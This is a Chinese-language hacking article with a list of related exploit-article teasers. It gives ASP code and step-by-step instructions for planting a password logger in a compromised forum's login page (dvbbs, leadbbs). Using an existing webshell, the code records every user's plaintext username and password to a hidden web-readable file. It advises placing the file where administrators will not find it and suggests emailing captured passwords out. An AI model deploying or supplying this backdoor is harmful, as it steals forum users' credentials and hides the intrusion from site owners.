用asp记录论坛用户密码(dvbbs,leadbbs等)

所属分类: 实用技巧 / 漏洞研究 阅读数: 1901
收藏 0 赞 0 分享

很多人在得到动网的数据库后郁闷不已 (呀的,管理员的变态密码让我们的机器跑砸了都没辙)  
Now We Have Another Method!!!!!  这就是用asp记录明文密码。  

用法:1.将此代码插入login.asp或admin_login.asp等等验证登陆的文件末尾即可。  
2.将PATH换成web下可访问的路径,如:C:\Inetpub\wwwroot\...\Info.txt(info.txt的路径越深越好,防止admin发现)  
3.你的webshell必须有权限修改文件且FileSystemObject可用。  
4.一段时间后在IE上 访问:http://.../Info.txt就 可以看到登录过的用户的帐号密码。  
5.在IE上输http://.../(which your modified).asp?u=del可一清楚info.txt的内容。  

注意:1.你可以为它添加其他功能,例如:已记录的用户不再重复记录,用邮件接收密码等等。  
2.为了防止info.txt过大,我用清空info.txt的方法。  
当然你可以新建文件来解决此问题。  
if filesize>200000 then  
set file2=fso.OpenTextFile(PATH,2,True)  
file2.WriteLine ""  
file2.close  
end if  
--------------------------------------------------------------------  
<%  
dim fso  
dim file  
dim file2  
dim filesize  
dim file3  
set fso=server.createobject("Scripting.FileSystemObject")  
If Request("u")="del" Then  
set file=fso.OpenTextFile(PATH,2,True)  
file.WriteLine ""  
End If  
If fso.FileExists("PATH") Then  
set file=fso.OpenTextFile(PATH,8,True)  
Else  
set file=fso.CreateTextFile(PATH)  
end if  
file.WriteLine "Username:"+Request.form("Username")  
file.WriteLine "Password:"+Request.form("password")  
file.close  
set file3=fso.GetFile(PATH)  
filesize=file3.size  
if filesize>200000 then  
set file2=fso.OpenTextFile(PATH,2,True)  
file2.WriteLine ""  
file2.close  
end if  

set file=nothing  
set file2=nothing  
set filesize=nothing  
set fso=nothing  
%>  
----------------------------------------------------------------------  

By ymqsz  
E-mail:ymqsz@tom.com  

更多精彩内容其他人还在看

MySQL Proxy(解决注入的另一思路)

MySQL Proxy的主要作用是用来做负载均衡,数据库读写分离的。但是需要注意的是,MySQL Proxy还有个强大的扩展功能就是支持Lua语言——魔兽也是使用了Lua来开发游戏,据我所知网易也是——可以参见云风的博客。
收藏 0 赞 0 分享

phpwind管理权限泄露漏洞利用程序发布

phpwind是国内使用非常广泛的一款程序,由于在程序设计上存在错误,导致任何人可以取得前台管理员及斑主权限,做删除帖子等任意操作
收藏 0 赞 0 分享

分析NtGodMode.exe干了什么

NtGodMode.exe是通过打开LSASS.EXE进程msv1_0.dll模块空间里,然后搜索特征值8B 4D 0C 49之后第1个32 C0 这个32C0汇编码xor al,al,修改为B001对应汇编码mov al,1 为什么mov al,1,以后就不用密码了?
收藏 0 赞 0 分享

伯乐asp收信程序漏洞及利用程序利用代码

信息来源:邪恶八进制信息安全团队(www.eviloctal.com) 文章作者:fhod 发这个也是因为看了asm所写的新概念收信程序 箱子永远不会被黑
收藏 0 赞 0 分享

字符集导致的浏览器跨站脚本攻击分析

前言:这种利用类型的攻击早在06年就被安全研究人员指出,不过一直没有在国内重视。而由于我们国内大部分站点正是这种有漏洞的字符集,所以影响还是比较大,希望各大站快速修复。可以看看http://applesoup.googlepages.com/。
收藏 0 赞 0 分享

Search Engine XSS Worm

作者:余弦 来源:0x37 Security 有挑战才有意思,为了诞生个Search Engine XSS Worm,这里拿yeeyan做实验了。
收藏 0 赞 0 分享

CPU也有远程攻击漏洞 英特尔匆匆修补

BEAREYES.COM 北京 [ 翻译 ] 作者:1000years 日期:2008年08月12日
收藏 0 赞 0 分享

暂时屏蔽 IE 最新 0day的4 种方法

IE 最新 0day 波及了微软全线系统居然在2008年12月14日8:00:15还没有出补丁!我查看微软站点,好像有几个手动操作的办法暂时屏蔽。
收藏 0 赞 0 分享

Sql Server 应用程序的高级Sql注入第1/2页

这篇文章讨论常用的"sql注入"技术的细节,应用于流行的Ms IIS/ASP/SQL-Server平台。这里探讨有关这种攻击各种可以注入程序访问数据和数据库防范的方法。
收藏 0 赞 0 分享

ASP木马后门新思路

ASP木马后门新思路
收藏 0 赞 0 分享
查看更多